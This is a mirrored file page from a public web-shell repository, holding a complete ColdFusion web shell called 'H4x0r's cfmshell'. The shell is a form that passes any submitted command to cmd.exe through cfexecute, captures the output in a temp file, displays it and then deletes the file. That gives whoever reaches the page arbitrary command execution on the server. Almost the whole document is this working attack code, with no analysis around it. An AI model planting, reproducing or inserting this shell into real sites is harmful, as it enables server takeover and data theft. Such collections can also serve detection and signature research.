mirror of
https://github.com/tennc/webshell
synced 2024-11-22 11:13:03 +00:00
31 lines
No EOL
803 B
Text
31 lines
No EOL
803 B
Text
<html>
|
|
<head>
|
|
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
|
|
<title>H4x0r's cfmshell</title>
|
|
</head>
|
|
<body>
|
|
<!--- os.run --->
|
|
<cfif IsDefined("FORM.cmd")>
|
|
<cfoutput>#cmd#</cfoutput>
|
|
<cfexecute name="C:\Winnt\System32\cmd.exe"
|
|
arguments="/c #cmd#"
|
|
outputfile="#GetTempDirectory()#foobar.txt"
|
|
timeout="1">
|
|
</cfexecute>
|
|
</cfif>
|
|
<form action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>" method="post">
|
|
<input type=text size=45 name="cmd" >
|
|
<input type=Submit value="run">
|
|
</form>
|
|
<cfif FileExists("#GetTempDirectory()#foobar.txt") is "Yes">
|
|
<cffile action="Read"
|
|
file="#GetTempDirectory()#foobar.txt"
|
|
variable="readText">
|
|
<textarea readonly cols=80 rows=20>
|
|
<CFOUTPUT>#readText#</CFOUTPUT>
|
|
</textarea>
|
|
<cffile action="Delete"
|
|
file="#GetTempDirectory()#foobar.txt">
|
|
</cfif>
|
|
</body>
|
|
</html> |